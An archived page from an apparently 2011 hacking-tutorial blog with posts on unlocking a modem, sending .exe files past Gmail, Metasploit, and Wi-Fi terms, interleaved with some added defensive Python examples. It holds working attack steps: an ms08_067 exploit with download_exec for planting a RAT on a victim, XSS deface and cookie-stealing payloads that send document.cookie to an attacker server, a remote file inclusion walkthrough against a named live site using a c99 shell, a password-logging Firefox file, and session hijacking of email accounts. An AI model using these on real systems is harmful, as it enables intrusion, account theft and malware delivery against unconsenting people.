Showing posts with label Hacking Tutorials. Show all posts

Sep 1, 2011

How to unlock Idea netsetter E-1550

Idea NetSetter is a 3G HSDPA USB device whose model number is Huawei E1550. The device has a maximum speed of 3.6 Mbps, which means 330 KB/sec of download speed.

Here is a step-by-step tutorial on unlocking the Idea NetSetter E-1550.



First, download the following software, which we are going to use:

1. Modem firmware, and install it (Download from here).
2. Mobile Partner’s 11.302.09.01.539 Voice USSD, and install it > Click here to download.
3. Video MMS Dashboard. Click here to download it.
4. E-1550 NetSetter Unlocker. Click here to download it.

Now follow these steps:

1. Run the setup file which was downloaded in the 1st step.
> Select "I accept" and click Next.
> It will then search for your device.
> It then displays the update settings.
> Click Next and it shows a warning.
> It will then ask you to input a password.
You have to enter the Flash code, which we will generate in the next step.
2. Open the unlocker downloaded in the 4th step and put your IMEI number in it.
> Click Unlock and it will generate the Flash code.
> Put the Flash code into the prompt from the 1st step.
3. After putting the Flash code in the 1st step, click Next.
> The update completes successfully.

4. Now, you are one step closer to unlocking of the NetSetter device. Start the setup file of HUAWEI_UTPS11.302.09.06.209 software and follow the steps. Again, ensure that the 3G device is not being used by any other software so that the application could find it easily.
> Proceed as in the step above and it will download the software to your device.

5. This step involves installing the Huawei Original Unbranded Mobile Partner software on your computer to manage the 3G device. It is the same software that comes with NetSetter but it is just that it is unbranded and has no logo for any telecom company. But it is recommended to install to complete the unlocking procedure. It is like a normal software installation and does not require any specific guidelines.

Then put flash code on Flash code box and You are done with resetting your Idea netsetter modem E1550 SUCCESSFULLY!!!

NOW You can use the device for making voice calls right from your computer using the computer’s mic and speakers.





Enjoy the new firmware on your device. If you have any problem, ask in the comment box.

thanx to my buddy ::H4(K3R4U

by::hemal modi

Jul 30, 2011

How To Send .EXE Files From Gmail



We all know that Gmail doesn't allow sending executable files.
When a user tries to send one, everything works until sending: when the user clicks the Send button, Gmail displays the message "hello.exe is an executable file. For security reasons, Gmail does not allow you to send this type of file." So that means the user can't send .exe files.


I am sharing one trick by which a user can easily send any type of attachment through Gmail. Follow these steps:


Select the file which you want to send. Suppose I selected hello.exe
  • Now go to Folder Options (type control in Run, then look for Folder Options). Go to the View tab.

  • Uncheck "hide extensions for unknown file types". Apply and then OK.

  • Now rename the file hack.exe to hack.ex, or any other extension name you want to add.

  • Inform the receiver about the changed extension and ask them to rename it with the .exe extension.

That's all.


We can also send it via WinRAR or WinZip, but sometimes Gmail scans inside these files too, so the above-mentioned way is the good choice.

update...screen shot attached..






by --hemal modi

Jun 20, 2011

Basic Introduction to Metasploit | Hackersbay.in



The Basic ---- Introduction
  
What is Metasploit ?

The Metasploit Project is an open-source computer security project which provides information about security vulnerabilities and aids in penetration testing and IDS signature development. Its most well-known sub-project is the Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive, and security research.

Basically, Metasploit is a tool which provides a complete environment for hacking.

Read More
___________________________________________________________________________

Using The Features

In this part we will talk about using the exploits, payloads, auxiliary modules, nops and encoders.

I think I don't need to explain what these are, because they were already discussed in the first part.

Metasploit has


+ -- --=[ 684 exploits - 355 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops



This may vary in your metasploit according to your version.


The Basic use of metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

Read More  
____________________________________________________________________________


Hacking a Box and Giving Instructions using meterpreter


Welcome to the Metasploit Basics Part 3. In this part I will show you a live example of how to own a PC with some exploit and what to do after the Meterpreter session is opened. In short, I will explain the Meterpreter to you.

Meterpreter is the short form of Meta-Interpreter. The Meterpreter is one of the advanced payloads available with the MSF. The way to look at the Meterpreter is not simply as a payload, but rather as an exploit platform that is executed on the remote system. The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system. In short, the Meterpreter helps us to overcome the limitations and disadvantages of an individual payload like the adduser payload.

Read More

_____________________________________________________________________________

Note To Readers - If you want to promote your articles or web blogs then i will do it for free even if your blog rank is the lowest in alexa or google.

Contact me at -facebook.com/sauravhacker

May 25, 2011

Securing Your Wireless Network | A white paper from Hackersbay



Sorry guys, I was out for many days. I am back with a new article about Securing Wireless Networks - A white paper from Hackersbay

Here are a few terminologies you should know about wireless networked systems. If you don't understand these underlying concepts, you will have a hard time guarding your wireless network.

SSID: (Service Set Identifier) If you have a wireless router or modem, the hardware must have an SSID. (It is like naming a newborn baby: you can name your router whatever you want others to call it. But if you take a BSNL connection, the Wi-Fi ADSL modem comes with an SSID name that may be the second name of your father.)


[Image: device burned with MAC & SSID, found in the picture (WANADOO-02DB)]

A router has a functionality that lets it broadcast or stealth broadcast. This means that if you scan for wireless networks you often find networks in broadcast mode (i.e. Tikona 1800 204 3333). In stealth broadcast we can't identify the wireless network. A MODEM doesn't have this fuckin option, so that's why whenever you scan, you find some home network modems in range, but you can proceed only after giving the SSID in the prompt box.




 WEP: (Wired Equivalent Privacy) This protocol gives base-level security for all Wi-Fi vendors and systems, which can benefit from the OSI standardization effort. The fat ass option is that one can set it "ON" or "OFF" to use this, but mostly all jerks and geeks forcibly set this "ON".

 WPA: (Wi-Fi Protected Access) A security protocol that was designed to secure wireless technology and to overcome the WEP limitations (WPA & WPA2).

 TKIP: (Temporal Key Integrity Protocol) It's a more secure version of WEP and it utilizes WPA for network security. It uses some different kinds of algorithms than WEP, with more trusted encryption tunnels. (But trust me, most admins will not use this. But if the company security policy wants to maintain a different security scheme for each hierarchy of the employees in the org, admins will deploy this feature.)
 
MAC: (Media Access Control) It's used to get multiple access in a networked environment. A MAC address is a 12-digit hexadecimal number that is associated with a network adapter; the MAC address is unique to each IP address (00-12-FA-WE-3R-TR). The first 6 digits, 00-12-FA, are the manufacturer code, which says whom the network adapter belongs to, and the next 6 digits, WE-3R-TR, are assigned to the unique person.

 DHCP: (Dynamic Host Configuration Protocol) It's one of the inbuilt features of a router. It serves the user who restarts the system, generating a fresh IP address for them to frame the device address in the network.


Whether you are in a wired or wireless environment, you are under scan by someone's eye. A TCP monitor, or anyone using sniffer tools like Packetyzer, can read your communication, because all the transportations are not encrypted.

POSSIBLE ATTACKS: 

EAVESDROPPING (Installing malicious tools and making your machine a listener; the hacker gets all packet information because it was redirected by him to the server)

DoS Attacks: Injecting noise or interference in the wireless network infinitely, which in turn causes denial of the particular service which they requested. Remember, a hacker can extract the SSID name of the network in response to his ICMP packets. This gives you a glimpse of DoS attacks.

WEP Encryption "TURN ON"
WEP encryption is the standard encryption scheme for all OSI network compliance products. It comes with encryption, but it isn't "TURNED ON" automatically. Do it, and change all the defaults in the newly purchased router. So you have changed the SSID and turned on WEP, I assume.
 
DUMP THE DEFAULTS: Change all your default passwords, and keep this security checklist with you, which also includes changing the default subnet, that is 192.168.1.0.

 
Find the Original White Paper By h4ckfreak at Hackersbay

May 12, 2011

How to Hack Email Account with Cookie stealing [For Newbies]

How to hack Email account:

If you are a newbie and don't know about cookies, then for your information, a cookie is a piece of text stored on the user's computer by websites visited by the user. This stored cookie is used by the webserver to identify and authenticate the user. So, if you steal this cookie (which is stored in the victim's browser) and inject this stolen cookie in your browser, you can imitate the victim's identity to the webserver and enter his Email account easily. This is called Session Hijacking. Thus, you can easily hack an Email account using such Cookie stealing hacks.

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:
  1. Cookie capturing tool
  2. Cookie injecting/editing tool
1. Cookie capturing tool:

Suppose you are running your computer on a LAN. The victim too runs on the same LAN. Then, you can use a Cookie capturing tool to sniff all the packets to and from the victim's computer. Some of the packets contain cookie information. These packets can be decoded using the Cookie capturing tool and you can easily obtain the cookie information necessary to hack the Email account. Wireshark and HTTP Debugger Pro software can be used to capture cookies.

Update: Check out my Wireshark tutorial for more information on cookie capturing tool.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim's cookies, you have to inject those cookies in your browser. This job is done using a Cookie injecting tool. Also, in certain cases after injection, you need to edit cookies, which can be done by a Cookie editing tool. This cookie injection/editing can be done using the simple Firefox addons Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie Stealing is neglected because it has some serious drawbacks:
  1. Cookie has an expiry time i.e. after certain trigger cookie expires and you cannot use it to hijack victim session. Cookie expiry is implemented in two ways:
    1. By assigning specific timestamp(helpful for us).
    2. By checking for triggers like user exiting from webbrowser. So, in such cases, whenever user exits from his browser, his cookie expires and our captured cookie becomes useless.
  2. Cookie stealing becomes useless in an SSL encrypted environment, i.e. for https (Secure HTTP) links. But most Email accounts and social networking sites rarely use https unless the victim has manually set https as the mandatory connection type.
  3. Also, most cookies expire once victim hits on LogOut button. So, you have to implement this Cookie stealing hack while user is logged in. But, I think this is not such a serious drawback because most of us have the habit of checking "Remember Me". So, very few people actually log out of their accounts on their PCs.
So friends, this was a short tutorial on basics of how to hack Email account using Cookie Stealing. As I have stated, Cookie stealing has some disadvantages. But, I think Cookie stealing is a handy way to hack an Email account. In my next articles, I will post detailed tutorial to hack Facebook and Gmail accounts using Cookie stealing. If you have any problem in this tutorial on how to hack Email account using Cookie stealing, please mention it in comments.

Enjoy Cookie stealing trick to hack Email account...

Via: http://www.go4expert.com
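
The three drawbacks listed above are the controls a site owner turns on. As an added example (not part of the original post), this Python sketch issues a session cookie with `Secure` and `HttpOnly`, expires idle sessions and revokes them at logout on the server side, and audits `Set-Cookie` headers for the weak settings. The cookie name `sid`, the 15-minute timeout and the sample header are assumptions.

```python
import secrets
import time


class SessionStore:
    """Server-side session table; the cookie carries only a random token."""

    def __init__(self, idle_timeout=900, clock=time.time):
        self._idle_timeout = idle_timeout  # allowed inactivity in seconds (assumed value)
        self._clock = clock                # injectable so expiry can be tested
        self._sessions = {}                # token -> (user, last_seen)

    def login(self, user):
        token = secrets.token_urlsafe(32)  # unguessable, contains no user data
        self._sessions[token] = (user, self._clock())
        return token

    @staticmethod
    def set_cookie_header(token):
        # Secure   -> only sent over HTTPS, so a LAN sniffer never sees it
        # HttpOnly -> not exposed to document.cookie
        # no Expires/Max-Age -> session cookie, dropped when the browser exits
        return f"sid={token}; Path=/; Secure; HttpOnly; SameSite=Lax"

    def validate(self, token):
        """Return the user for a live token, or None if unknown or idle too long."""
        entry = self._sessions.get(token)
        if entry is None:
            return None
        user, last_seen = entry
        now = self._clock()
        if now - last_seen > self._idle_timeout:
            del self._sessions[token]      # expired: a replayed copy is useless
            return None
        self._sessions[token] = (user, now)
        return user

    def logout(self, token):
        # Revoke on the server, not just in the browser, so a captured
        # cookie stops working the moment the user logs out.
        self._sessions.pop(token, None)


def audit_set_cookie(header_value):
    """Return (cookie_name, [issue codes]) for one Set-Cookie header value."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].partition("=")[0]
    attrs = {p.partition("=")[0].strip().lower() for p in parts[1:]}
    issues = []
    if "secure" not in attrs:
        issues.append("no-secure")      # travels over plain HTTP
    if "httponly" not in attrs:
        issues.append("no-httponly")    # readable by page scripts
    if "expires" in attrs or "max-age" in attrs:
        issues.append("persistent")     # survives browser exit ("Remember Me")
    return name, issues


# Constructed sample of a weak header, for illustration only.
WEAK_HEADER = "sid=abc123; Path=/; Max-Age=2592000"

if __name__ == "__main__":
    store = SessionStore()
    tok = store.login("alice")
    print(audit_set_cookie(store.set_cookie_header(tok)))
    print(audit_set_cookie(WEAK_HEADER))
    store.logout(tok)
    print(store.validate(tok))
```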

May 3, 2011

Firefox a inbuilt keylogger

I am sorry if you thought something else while visiting this post :P

Mozilla Firefox can be turned into an undetectable keylogger. This keylogger will be used to store all the usernames and passwords that are entered by the user.

Steps to Turn Your Firefox Into A KeyLogger


  • Close Firefox Application if open
  • Go to: Windows- C:/Program Files/Mozilla Firefox/Components
  • Find The Script Named " nsLoginManagerPrompter.js"
  • Click here to download the file unzip it and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one already edited to save all usernames and passwords with user intimation.

From now on, when someone logs onto any site, their username and password will be saved automatically, without a prompt!

To retrieve the account information, make sure Firefox is opened, go to Tools > Options > Security Tab > click on saved passwords, then click on show passwords, and press yes
 
This is not a remote keylogger but a good one if your victim uses your computer while managing his accounts ;)

Apr 30, 2011

WEBOPEDIA - The experts choice

Hacking and Security: both words are related to one thing, THE COMPUTER. Now the computer also has its own living style.

There are some words in the world of computers which are difficult to understand, like SSID, OEM, WI-FI, OSI, CPU, etc.

It becomes damn difficult to know the meanings when you don't have a dictionary (Oxford doesn't give the meanings).

So Now I have a very good dictionary for you guys :)

WeBOpeDia The HacKerS ChoIce

Go here and see it yourself :)

do reply here


Apr 25, 2011

BodgeIt Store, the vulnerable web application for penetration testers

There are various vulnerable web applications, such as Jarlsberg, WackoPicko, Damn Vulnerable Web Application (DVWA), Vicnum, etc. Now we have another application that is vulnerable and ready to be exploited! The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to penetration testing.

Features
  • Easy to install – just requires java and a servlet engine, e.g. Tomcat
  • Self contained (no additional dependencies other than the 2 in the above line)
  • Easy to change on the fly – all the functionality is implemented in JSPs, so no IDE required
  • Cross platform
  • Open source
  • No separate db to install and configure – it uses an ‘in memory’ db that is automatically (re)initialized on start up
Install
All you need to do is download and open the zip file, and then extract the rar file into the webapps directory of your favorite servlet engine.

You may use http://www.apachefriends.org/en/xampp-windows.html#522 for this

DOWNLOAD bodgeit.1.1.0.zip

Thank You 



Apr 23, 2011

Making a PHP RAT | VB.NET



What is a RAT ?


The RAT connects using standard TCP/IP protocol, as long as the server file is loaded on the target victim computer. Once this file has been loaded once, the operator of the client end of the tool can then modify the registry to cause this file to be started everytime Windows starts, ensuring the hacker will always have access to the infected system.

Once access has been established, the hacker has almost complete control over his target. Every file on the system can be renamed, moved, deleted, frozen, changed, replaced, anything you can imagine. WAV files can be played, or played on loop, to annoy the hell out of the receiving end. Video and still images can be captured to have a log of the computer's visual activity.

In addition to this, the tool allows the hacker to share additional drives over the network, such as floppy or CD drives, allowing the hacker to write files to floppies or open/close the CD-ROM drive.

A more serious tool in the hacker's possession is the ability to log all keystrokes on the infected machine, allowing him to acquire passwords from the system. In addition, it can also acquire cached passwords, such as Windows Logon passwords, making the system incredibly vulnerable to attack and vandalism.

Finally, if the hacker is persistent enough, he can prevent the user from removing the tool from a variety of ways, short of disabling the network. Shutting down, locking, and restarting the computer are all options to stop the victim from removing the trojan, unless the network connection is broken.


Watch the VIDEO 


 note- PHP RAT DOESN'T NEED PORT FORWARDING 

Credits to - The original makers of this video

Happy Hacking

Apr 17, 2011

Change Proxy | Change Your Proxy Using Firefox


♥ I love Proxies ♥

What Are Proxies ?
In computer networks, a proxy server is a server (a computer system or an application) that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource, available from a different server. The proxy server evaluates the request according to its filtering rules. For example, it may filter traffic by IP address or protocol. Go here to learn more.

Now Up to the Topic  (Changing your proxy)

We change it for - anonymity  purposes
Requirements 
i)A browser - (In my case i am gonna use Firefox)
ii)Fresh Proxies (Not Dead or Outdated Ones)


For Proxy I am Going To Use - Hidemyass's Proxy Lists 

There we can get very fast and updated servers That is why i ♥ it :D


S     T    E    P    S

I am now going to use a fast German proxy for this tutorial




Then go to Tools > Options > Advanced > Network tab > Settings



 Click on OK you are done then :D


Notes-
  • This proxy was an example proxy; using the one which I used may cause malfunctions in your connection
  • Always Do with a FRESH PROXY 
  • Do select a proxy with good speed and connection time (I suggest using US/UK proxies)
  • After finishing your work again follow the above steps and click on Auto-Detect proxy setting for this network
Hope You enjoyed this small tutorial


Happy Hacking

Mar 8, 2011

Mozilla Firefox - The hacker's choice

Security testers and hackers have a lot of tools to play around with. But what if your browser helps you in this?

The magical browser is Mozilla Firefox, with the extensions/add-ons developed by professional ethical hackers and penetration testers.

In this article I will tell you about some of the best add-ons of all time that hackers use.

Download Firefox from Google

Now back to topic

Social engineering add-on

People Search and Public Record: This Firefox extension is a very handy tool for investigators,hackers,legal professionals, and anyone interested in doing their own basic people searches and public record look ups as well as background research.

Google and Spider

Advanced dork : Gives quick access to Google’s Advanced Dorks directly from the context menu. This could be used to scan for hidden files or narrow in a target anonymously.

SpiderZilla : Spiderzilla is an easy-to-use website mirror utility, based on Httrack

Editors (WEBMASTER)

JSView : The ’view page source’ menu item now opens files based on the behavior you choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor..

Firebug : Firebug integrates with Firefox to put a wealth of development tools at your hand while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page

XML Developer Toolbar:allows XML Developer’s use of standard tools all from your browser.


Headers manipulation
and agent switcher

HeaderMonitor : This is Firefox extension for display on statusbar panel any HTTP response header of top level document returned by a web server. Example: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.

RefControl : Control what gets sent as the HTTP Referer on a per-site basis.

User Agent Switcher :Adds a menu and a toolbar button to switch the user agent of the browser

Cookies manipulation/editors 

Add N Edit Cookies : Cookie Editor that allows you add and edit "session" and saved cookies.

httpOnly : Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side
 Allcookies : Dumps ALL cookies (including session cookies) to Firefox standard cookies.txt file

Security Tools

HackBar : This toolbar will help  in testing sql injections, XSS holes and site security.This tool will not help you to exploit the vulnerability or to learn hacking. Its main purpose is to help a hacker do security audits on his code.

Tamper Data : tamper data to view and modify HTTP/HTTPS headers and post parameters.

Chickenfoot: Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing

Proxy utilities

POW (Plain Old WebServer) : The Plain Old Webserver uses Server-side JavaScript to run a server inside your browser. Use it to distribute files from your browser. It supports Server-side JS, GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your site. Users have created a wiki, chat room and search engine using SJS.

FoxyProxy : FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s proxy configuration. It offers more features than SwitchProxy, Proxy Button etc

SwitchProxy: SwitchProxy lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes

miscellaneous 

Hacks for fun 

Greasemonkey : Allows you to customize the way a webpage displays using small bits of JavaScript. Scripts can be downloaded at user scripts.

Feb 16, 2011

A Complete Tutorial On XSS (cross site scripting)






Welcome To another lesson in which i will be covering XSS..

Table Of Contents
What is XSS?
Finding XSS Vulnerabilities
The Basics On XSS
Deface Methods
Cookie Stealing
Filtration Bypassing
___________________
What is XSS?
'XSS', also known as 'CSS' (Cross Site Scripting, easily confused with 'Cascading Style Sheets'), is a very common vulnerability found in web applications. 'XSS' allows the attacker to INSERT malicious code. There are many types of XSS, but I will only explain 3 of them, and they are the most important.
1- 'URL XSS': this means that the XSS won't stay on the page; it will only get executed if you have the malicious code in the URL and submit the URL.

2- Input fields: wherever you can insert data, it is very common for it to be XSS vulnerable. For example, say we found a site with a search engine. In the search box you enter 'hacker' and hit enter. When the page loads, it shows your data, like 'Found 100 Results For hacker'. So you see it is displaying our data on the page; now what if we can execute code? There is no possible way to execute PHP code in this attack, but there certainly is for HTML and JavaScript, but be aware this method.

3- In the third one you will be able to INSERT data (code) and it will stay on the website. There are 2 kinds, depending on whether we can execute PHP or HTML: if we can inject PHP then we can also inject HTML, but NOT vice versa. This kind of attack is normally found on blogs, shoutboxes, profiles and forums, just most places where you insert data and it stays there. Now, HTML is totally different from PHP. HTML downloads to your PC and then your 'browser' parses/interprets the code (that's why its source is viewable). With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser. PHP injection is rare, but it doesn't harm to try. Note: PHP code can't be injected into an HTML page!

Finding XSS Vulnerabilities
Well, to start finding these vulnerabilities you can start checking out blogs, forums, shoutboxes, comment boxes, search boxes and many other things.

Using 'Google Dorks' makes the finding easier. OK, if you want to get cracking, go to Google.com and type
inurl:"search.php?q=" Now that is a common page and has a lot of results. Now let's move on to the next part.

The Basics On XSS


To know the basic this Picture may help you 


The most used Xss injection is 

<script>alert("XSS")</script>

This will pop up an alert saying XSS if the site is vulnerable. It is easily editable, which means you can also inject
<script>alert("your name or message")</script>
Going back, I told you a Google dork, search.php?q=
Well, we will use this to check for vulnerabilities.

To check if it is vulnerable we type

www.site.com/search.php?q=<script>alert("your name or message")</script>


This then gives a popup like this




 Many times this works, but if it does not work don't cry, we have another way.. :P

 You can try injecting HTML ;)

You can use these two strings to inject HTML

<h1>anything you want</h1>
<br><br><b><u>any thing you want</u></b>

so our url will be

www.site.com/search.php?q= <h1>anything you want</h1>
or 
www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
If you see the bold text on the page and the newlines, then you know it's vulnerable.

Example






















Deface Methods 
Well, now that you understand how XSS works, we can explain some simple XSS deface methods. There are many ways of defacing; I will mention some of the best and the ones I used most.
 
<html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

The first one is IMG SRC. For those of you who don't know HTML, IMG SRC is a tag that displays the IMAGE linked to it on the webpage.


OK, now if you change the link to a valid picture link, save it and run it, you will see your deface page.

Let us say we have found a shoutbox, comment box, or anything that shows your data after you submitted it; you could insert the following to make the picture display on the page.

<IMG SRC="http://site.com/yourDefaceIMAGE.png">

OK, it helps to make your picture big so it stands out and it's clear the site got hacked.

Another method is using FLASH videos. It's the same as the method below, but a slightly more stylish deface.

<EMBED SRC="http://site.com/xss.swf"

that will execute the flash video linked to it.

Now a popup or a redirection

<script>window.open( "http://hacking-class.blogspot.com" )</script>

 Cookie Stealing

This is the best thing about XSS..

First Get your self a cookie stealer- from here 

OK, now that you have it, save it as a .php file and upload it to your server. Remember to create the file 'log.txt' too and chmod it to 777. OK, now find an XSS vulnerable website; any attack type will do.

OK, now you're going to want to insert this code.

window.location = "http://yourServer.com/cookielogger.php?c="+document.cookie

or

document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
Now when a user visits the page that got injected, they will be sent to the site, and the cookie will be stolen.
The second one is more stealthy.

Now it is time to hijack the cookies



http://site.com/search.php?q=document.location = "http://yourServer.com/cookielogger.php?c="+document.cookie
 Filtration Bypassing


A lot of sites may seem vulnerable but do not execute the code. This will help you.

Some common methods to bypass filtration are

')alert('xss');

or

");alert('xss');

That will do the same thing as <script>alert("XSS")</script> on a vulnerable server.

You can also try hexing or base64 encoding your data before you submit.

Please note it's bad practice to use alert("XSS") to test for XSS, as I've known sites to block the keyword XSS before.

Some other ways to bypass filtration

<script type=text/javascript>alert("saurav")</script>
<script>alert("saurav")</script>;
<script>alert("saurav");</script>
<script>alert("/saurav"/)</script>

Hope that helped you


Happy Hacking
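
Why the filter bypasses above work, and what stops them: as an added example (not part of the original post), this Python sketch runs the strings from this tutorial through a keyword filter and through context-aware output encoding. The function names and the page template are assumptions modelled on the 'Found 100 Results For hacker' search page.

```python
import html
import json

# Strings quoted from the tutorial above, used here as test input only.
PAGE_SAMPLES = [
    '<script>alert("XSS")</script>',
    '<script type=text/javascript>alert("saurav")</script>',
    '<h1>anything you want</h1>',
    "');alert('xss');",
    '");alert(\'xss\');',
]


def keyword_filter(value):
    """Weak defence: strips one exact spelling of the tag and nothing else."""
    return value.replace("<script>", "").replace("</script>", "")


def render_unsafe(query):
    """Vulnerable: user input is pasted into the HTML as-is."""
    return f"<p>Found 100 Results For {query}</p>"


def render_html(query):
    """HTML body context: encode < > & and both quote characters."""
    return f"<p>Found 100 Results For {html.escape(query, quote=True)}</p>"


def js_string_literal(value):
    """JavaScript string context inside a <script> block.

    json.dumps escapes quotes and backslashes, so ') or ") cannot close the
    string; < > & are additionally written as \\uXXXX so the value can never
    end the script element or start a new tag.
    """
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


def render_inline_script(query):
    """Hypothetical template that echoes the query into inline JavaScript."""
    return f"<script>var lastQuery = {js_string_literal(query)};</script>"


def survives_as_markup(rendered, template_tags=("<p>", "</p>")):
    """True if any '<' is left once the template's own tags are removed."""
    for tag in template_tags:
        rendered = rendered.replace(tag, "")
    return "<" in rendered


if __name__ == "__main__":
    for sample in PAGE_SAMPLES:
        filtered = survives_as_markup(render_unsafe(keyword_filter(sample)))
        encoded = survives_as_markup(render_html(sample))
        print(f"{sample!r}: markup after keyword filter={filtered}, "
              f"after encoding={encoded}")
        print("  inline script:", render_inline_script(sample))
```

The keyword filter lets the `type=` variant and plain HTML through, while encoding for the output context neutralises every sample without needing a list of bad words.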

Feb 14, 2011

Hacking Website Using Remote File Inclusion



Welcome back to hacking-class. In this article I will tell you about Remote File Inclusion. It is basically one of the most common vulnerabilities found in web applications. This type of vulnerability allows the hacker or attacker to add a remote file on the web server. If the attacker succeeds in performing the attack, he/she will gain access to the web server and hence can execute any command on it.

1-Searching the Vulnerability
A Remote File Inclusion vulnerability usually occurs in those sites which have a URL similar to the one below.
The Google dork is
“inurl:index.php?page=”
This will show all the pages which have “index.php?page=” in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker normally uses the following command


But as I am posting this here, the links must be different :P

I found this site it is very good to give you example

http://www.cbspk.com

Now we wanna check if it is vulnerable .. we type

http://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.com

Now This appears 


A website opens in another website this means this website is vulnerable to RFI.

You can also type

http://www.cbspk.com/v2/index.php?page=http://www.google.com

and u will get some similar results.

Ok now Moving On to the next part...


Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. 

The hacker would first upload the shells to a webhosting site such as ripway.com, 110mb.com etc.
Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is.

http://h1.ripway.com/saurav1234/c99shell.php?
Now here is how the hacker will execute the command on the website

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?
Now voilà, we have executed the shell




 Now I will not tell you how to run your scripts using the shell; try finding out yourself.

Note- Remember to add “?” at the end of the URL or else the shell will not execute.

This is for educational purposes only; using this knowledge in an illegal way is strictly prohibited.
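
From the defender's side, the `page=http://...` requests shown above are easy to refuse and easy to spot. As an added example (not part of the original post), this Python sketch resolves the `page` parameter through a fixed allowlist and scans access-log lines for include parameters that carry an absolute URL. The page names, file paths, parameter list and log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Hypothetical allowlist: the only values "page" may take, mapped to local files.
# In PHP the same idea is an array lookup before include(); keeping
# allow_url_include=Off in php.ini blocks remote includes as a second layer.
ALLOWED_PAGES = {
    "home": "pages/home.php",
    "about": "pages/about.php",
    "contact": "pages/contact.php",
}


def resolve_page(param):
    """Return the local file for a known page name, or None (serve a 404)."""
    return ALLOWED_PAGES.get(param)


REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d(?:\.\d)?"')
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def find_rfi_attempts(log_lines, include_params=("page",)):
    """Return (client_ip, parameter, decoded_value) for suspicious requests.

    A request is flagged when a parameter that feeds an include holds an
    absolute URL. parse_qsl percent-decodes once; the extra unquote() also
    catches double-encoded values.
    """
    hits = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key not in include_params:
                continue
            decoded = unquote(value)
            if SCHEME_RE.match(decoded):
                hits.append((line.split()[0], key, decoded))
    return hits


# Constructed access-log lines (common log format, documentation addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Feb/2011:10:01:02 +0000] '
    '"GET /index.php?page=about HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Feb/2011:10:01:09 +0000] '
    '"GET /index.php?page=http://files.example.test/x.txt? HTTP/1.1" 200 911',
    '198.51.100.7 - - [14/Feb/2011:10:01:15 +0000] '
    '"GET /index.php?page=http%253A%252F%252Ffiles.example.test%252Fx.txt HTTP/1.1" 200 911',
    '192.0.2.44 - - [14/Feb/2011:10:02:30 +0000] '
    '"GET /search.php?q=http://example.test/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, key, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} sent {key}={value!r}; allowlist result: {resolve_page(value)}")
```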










Feb 10, 2011

Infecting Ip using Metasploit

Using this Tutorial You can put your RAT,STEALER,KEYLOGGER or DDOSER using IP and this tutorial.

THIS TUTORIAL IS WRITTEN IN EDUCATIONAL PURPOSES ONLY!!

WE NEED:
1. Nmap
2. Metasploit 

1. First we need to find the victim's IP.
You can follow my TUTORIAL which I posted earlier

2. Now we need to create a database.
We open Metasploit and type 'db_create' (this will create the database)
If you created a database before, then it's enough to type 'db_connect' ...

3. Now we scan the victim's IP
So in Metasploit type 'Nmap'

The next command is 'nmap -sT -sV <target ip>' (in '<target ip>' we type the victim's IP without '<>')
When scanning is done, we will have a detailed description of the victim's computer...

If we get something like this, Windows 2000 (all versions XP SP1, SP2, SP3, SP4), we can do the attack without a problem..
4. Exploit

In console we type 'use windows/smb/ms08_067_netapi'
(This will select windows/smb/ms08_067_netapi)

Now type 'set target 0'
Then type 'show payloads'
Then 'set payload / download_exec'

Then type 'Show options'
You will see plenty of options; fill in only RHOST and URL.

Type: set RHOST <target IP>

Then type 'set URL http://www.site.com/xxx.exe' ('http://www.site.com/' should be your site, and 'xxx.exe' is the name of your RAT, stealer or virus that is uploaded on your site)
(http://www.fileave.com , http://www.zymic.com)
AT the end we type 'exploit'

Note-before Doing this have a look at my previous post Here

Feb 5, 2011

Bypass/Hack Adf.ly - Url shortener service

We all know there are tons of ways of making money online, like Adf.ly. Adf.ly pays bucks for each advertisement seen using your shortened link. The link viewer has to wait for 5 seconds until the advertisement loads, and only after 5 seconds can he view the actual page.

